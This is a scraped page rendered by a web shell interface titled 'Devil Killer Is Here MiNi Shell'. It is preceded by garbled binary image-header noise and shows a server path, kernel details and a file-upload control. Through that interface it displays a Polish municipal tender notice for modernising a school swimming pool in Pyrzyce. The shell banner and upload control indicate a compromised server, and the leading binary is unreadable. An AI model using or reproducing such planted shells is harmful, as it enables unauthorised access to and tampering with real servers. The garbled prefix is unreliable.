JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250725/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250725/0034660301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa i modernizacja krytej pływalni typu Delfinek przy Szkole Podstawowej im. J. Korczaka w Pyrzycach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pyrzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685711</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pyrzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">091/39 70 310</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">091/39 70 314</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa i modernizacja krytej pływalni typu Delfinek przy Szkole Podstawowej im. J. Korczaka w Pyrzycach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cd8c5d90-7d04-4426-a282-b2cfc713fcf9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00346603</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00026685/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Rozbudowa i modernizacja krytej pływalni typu Delfinek przy Szkole Podstawowej im. J. Korczaka w Pyrzycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_pyrzyce/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_pyrzyce/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Kontakt z Wykonawcami, w<br/>szczególności składanie zapytań,oświadczeń, wniosków, zawiadomień, jak również przekazywanie informacji odbywa się przy użyciu<br/>Platformy Zakupowej, dostępnej pod adresem https://platformazakupowa.pl/pn/smigiel.2. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w:1) „Regulaminie Internetowej Platformy<br/>zakupowej platformazakupowa.pl Open Nexus Sp. z o. o.” dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin<br/>oraz 2) „Instrukcji dla wykonawców” dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miejski w Pyrzycach, Plac Ratuszowy 1, 74-200 Pyrzyce;<br/>2) Inspektor ochrony danych urzęduje w Urzędzie Miejskim w Pyrzycach , Plac Ratuszowy 1, 74-200 Pyrzyce, tel. 91 39 70 317, e-mail: iod@pyrzyce.um.gov.pl w godzinach w poniedziałki 800-1600, w pozostałe dni tygodnia w godzinach 700-1500;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na : „ Rozbudowa i modernizacja krytej pływalni typu Delfinek przy Szkole Podstawowej im. J. Korczaka w Pyrzycach” <br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 Ustawy,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IiID.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Rozbudowa i modernizacja krytej pływalni typu Delfinek przy Szkole Podstawowej im. J. Korczaka w Pyrzycach”, zadanie realizowane w ramach zadania „Rozbudowa i modernizacja budynku pływalni w Szkole Podstawowej przy ul. Tadeusza Rejtana 6 w Pyrzycach” oraz w ramach zadania „Rozbudowa i modernizacja pływalni przy ul. Rejtana 6 w Pyrzycach”<br/><br/><br/><br/><br/>Zamówienie będzie prowadzone w trybie zaprojektuj i wybuduj.<br/><br/> Przedmiotem zamówienia jest rozbudowa i modernizacja budynku pływalni przy Szkole Podstawowej w Pyrzycach (dz. ewid. o nr: 20/54 oraz 20/51 i 188/2 dr, obręb 6 Pyrzyce), wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu, na podstawie wykonanej przez Wykonawcę dokumentacji projektowej. Zakres zamówienia obejmuje również zaprojektowanie i przebudowę drogi wewnętrznej na dz. 178/73, prowadzącą z ul. Tadeusza Rejtana na projektowany parking (opisana na PZT) oraz zaprojektowanie i realizację placu zabaw dla dzieci – lokalizacja do uzgodnienia z Zamawiającym. Rozbudowa obejmuje zabudowę dziedzińca, stanowiącego wewnętrzny teren zielony. Modernizacją objęta jest istniejąca pływalnia wraz z przynależnymi pomieszczeniami szatniowo-sanitarnymi oraz technicznymi.<br/>Wykonawca winien podjąć wszelkie niezbędne czynności, w tym ewentualną rozbiórkę istniejącego budynku basenu w celu zrealizowania przedmiotu zamówienia i uzyskania decyzji o pozwoleniu na użytkowanie.<br/> W ramach rozbudowy i modernizacji budynku pływalni, zgodnie z zapisami programu Ministerstwa Sportu i Turystyki pn.: „Sportowa Polska - Program rozwoju lokalnej infrastruktury sportowej - Edycja 2024”, zamówienie obejmuje: <br/>a) wykonanie 4 torowej niecki do nauki pływania o wymiarach: 16,67m x 8,5m i głębokość: 0,9m - 1,35m z dodatkowymi atrakcjami wodnymi (2 fontanny do masażu karku typu długiego, 6 podwodnych dysz ściennych do masażu).<br/>b) budowa strefy odnowy biologicznej,<br/>c) budowa zaplecza sanitarno-szatniowo-technicznego pływalni,<br/>d) modernizacja zaplecza sanitarno – szatniowego sali gimnastycznej,<br/>e) wykonanie placu zabaw,<br/>f) zagospodarowanie terenu.<br/><br/>1.	Zamówienie obejmuje wykonanie:<br/>1) pełno branżowej dokumentacji projektowej (budowlanej, wykonawczej, kosztorysowej) wraz z pozyskaniem wszystkich niezbędnych decyzji, uzgodnień, opinii, warunków i innych formalnych dokumentów niezbędnych do realizacji zamówienia,<br/>2)	dokonanie uzgodnień z Zamawiającym i przyszłym Użytkownikiem w zakresie wszelkich założeń i rozwiązań projektowych oraz budowlanych.<br/>3)	wykonanie robót budowlanych na podstawie ww. dokumentacji projektowej, w tym również:<br/>a) organizacja placu budowy,<br/>b) pozyskanie niezbędnych zgód na wejście na teren (dotyczy sąsiednich działek),<br/>c) zapewnienie niezakłóconego funkcjonowania Szkoły przez cały okres budowy,<br/>d) pełne uporządkowanie terenu po zakończeniu budowy, w tym odtworzenie istniejących nawierzchni na trasie prowadzonych przyłączy, zewnętrznych odcinków instalacji wewnętrznych oraz terenie prowadzonych prac,<br/>4)	zaprojektowanie i wykonanie wewnętrznej identyfikacji wizualnej obiektu ( oznakowanie wewnątrz budynku)<br/>5)	pozyskanie decyzji o pozwoleniu na użytkowanie.<br/><br/>2.	Szczegółowy zakres zamówienia, oraz standard wykonania, zostały określone w Programie funkcjonalno-użytkowym, stanowiącym załącznik nr 6 do SWZ. Pozostałe warunki realizacji zamówienia zostały określone we wzorze umowy, stanowiącym załącznik nr 5 do SWZ.<br/>3. Prace budowlane winny być realizowane zgodnie z opinią ornitologiczo- hiropterologiczną. <br/>Jeżeli prace budowlane będą realizowane w sezonie lęgowym ptaków to znaczy w terminie od marca do października z uwagi na fakt stwierdzenia na budynku gniazda sroki, Wykonawca w imieniu Zamawiającego powinien uzyskać zezwolenie Regionalnego Dyrektora Ochrony Środowiska na odstępstwa od zakazów w stosunku do zwierząt chronionych oraz sporządzić sprawozdanie z wykorzystania zezwolenia na odstępstwo od zakazów ( jeśli wymagane).<br/><br/>Ponadto przedmiot zamówienia obejmuje: <br/>1) koszt zabezpieczenia budowy, utrzymania zaplecza budowy, obsługi geodezyjnej,<br/>2) ustanowienie kierownika robót budowlanych, <br/>3) dokumentację powykonawczą,<br/>4) koszt energii elektrycznej i wody oraz innych mediów niezbędnych do realizacji zadania.,<br/>5)) inne koszty niezbędne do wykonania przedmiotu umowy, jeżeli Wykonawca, działający z najwyższą starannością, właściwą profesjonaliście powinien był je przewidzieć.<br/><br/>4.	Warunki dodatkowe dotyczące przedmiotu zamówienia<br/>1)	Jeżeli w dokumentacji projektowej, Specyfikacjach technicznych wykonania i odbioru robót budowlanych i przedmiarach robót, zostały wprowadzone nazwy własne materiałów lub produktów, Zamawiający dopuszcza zastosowania materiałów i produktów równoważnych do wskazanych pod warunkiem posiadania przez te materiały i produkty nie gorszych parametrów technicznych, charakteryzujących wskazany produkt, stanowiących o ich przydatności, charakterze, wytrzymałości, itp.<br/>2)	Użyte materiały muszą być fabrycznie nowe, posiadać certyfikaty i atesty oraz spełniać normy przewidziane przepisami prawa.<br/>3)	Wykonanie przedmiotu zamówienia musi być zgodne z wiedzą techniczną, zasadami sztuki budowlanej, przepisami bhp i ppoż. oraz obowiązującymi normami technicznymi i przepisami prawa.<br/>4)	Wykonawca wykona zaplecze terenu budowy na swój koszt.<br/>5)	Wykonawca odpowiada za przekazany przez Zamawiającego plac budowy i zobowiązany jest po zakończeniu robót do doprowadzenia terenu do stanu niepogorszonego oraz pokryje wszelkie koszty z tym związane.<br/>6)	Wykonawca ponosi odpowiedzialność za wszelkie szkody, jakich mogą doznać Zamawiający, jak i osoby trzecie w związku z wykonywaniem przedmiotu zamówienia, a w tym także związane z nienależytym wykonaniem.<br/><br/>5.	Wykonawca przed przystąpieniem do prac oraz przez cały okres realizacji robót zobowiązany jest na własny koszt zamontować i utrzymywać Tablicę informacyjną ( o wym. 180x120 cm) , a po zakończeniu robót zaktualizować treść tablicy informacyjnej, o której mowa w rozporządzeniu Rady Ministrów z dnia 7 maja 2021 r. w sprawie określenia działań informacyjnych podejmowanych przez podmioty realizujące zadania finansowane lub dofinansowane z budżetu państwa lub z państwowych funduszy celowych, zgodnej z wytycznymi dotyczącymi obowiązków informacyjnych przy zadaniach dofinansowanych ze środków Funduszu Rozwoju Kultury Fizycznej ( FRKF)<br/>6. Wykonawca wykona i zamontuje tablicę informacyjną o wymiarach min. 2,0 m x1,5m informującą o realizacji robót z dofinansowaniem ze środków zewnętrznych z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/><br/>7.	Niniejsza inwestycja jest przewidziana do dofinansowania ze środków FUNDUSZU ROZWOJU KULTURY FIZYCZNEJ zadania inwestycyjnego w ramach programu SPORTOWA POLSKA – PROGRAM ROZWOJU LOKALNEJ INFRASTRUKTURY SPORTOWEJ – EDYCJA 2024, oraz z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych, zwanego dalej „Programem”, zgodnie ze wstępną promesą Nr Edycja6PGR/2023/4567/PolskiLad \ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena -najniższa cena brutto 2. Przedłużenie okresu rękojmi i gwarancji Wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a) okres rękojmi i gwarancji na przedmiot umowy w minimalnym wymiarze wymaganym w SWZ, tj. w wymiarze 60 miesięcy - 0 pkt.<br/>b)	okres rękojmi i gwarancji na przedmiot umowy dłuższy od minimalnego o minimum 4 miesiące - 10 pkt.<br/>c)	okres rękojmi i gwarancji na przedmiot umowy dłuższy od minimalnego o minimum 8 miesięcy - 20 pkt,<br/>d)	okres rękojmi i gwarancji na przedmiot umowy dłuższy od minimalnego o minimum 12 miesięcy – 40 pkt.<br/>Minimalny okres rękojmi i gwarancji na przedmiot umowy wymagany przez Zamawiającego - 60 miesięcy. Oferta zawierająca krótszy od minimalnego okres gwarancji zostanie odrzucona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu;<br/>2)	spełniają warunki udziału w postępowaniu.<br/><br/>2. Opis warunków udziału w postępowaniu.<br/><br/>1) Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.<br/>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu. <br/><br/>2) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej.<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.<br/>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu. <br/><br/>3) Sytuacja ekonomiczna lub finansowa.<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania warunku udziału w postępowaniu w odniesieniu do warunku dotyczącego sytuacji finansowej. Warunek w odniesieniu do sytuacji ekonomicznej zostanie spełniony, jeśli Wykonawca wykaże że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość min. 5 000.000,00 zł (pięć milionów złotych).<br/><br/>4) Zdolności techniczne lub zawodowe.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający szczegółowe warunki <br/>udziału w postępowaniu, tj.:<br/>a)	Wykonawcy ubiegający się o udzielenie zamówienia publicznego muszą wykazać, że wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 roboty budowlane polegające na budowie, rozbudowie lub przebudowie obiektów basenowych z nieckami wykonanymi w systemie panelowym ze stali o powierzchni lustra wody nie mniejszej niż 130 m², o wartości min. 10 000 000,00 zł brutto. <br/> <br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, <br/>w oparciu o informacje zawarte w: <br/>	oświadczeniu o spełnianiu warunków udziału w postępowaniu, <br/>	w wykazie wykonanych robót budowlanych oraz w dowodach określających czy te roboty budowlane zostały wykonane należycie, w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.<br/><br/>b)	Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że <br/>w wykonywaniu zamówienia uczestniczyć będą:<br/>- jedna osoba, jako kierownik budowy, posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez 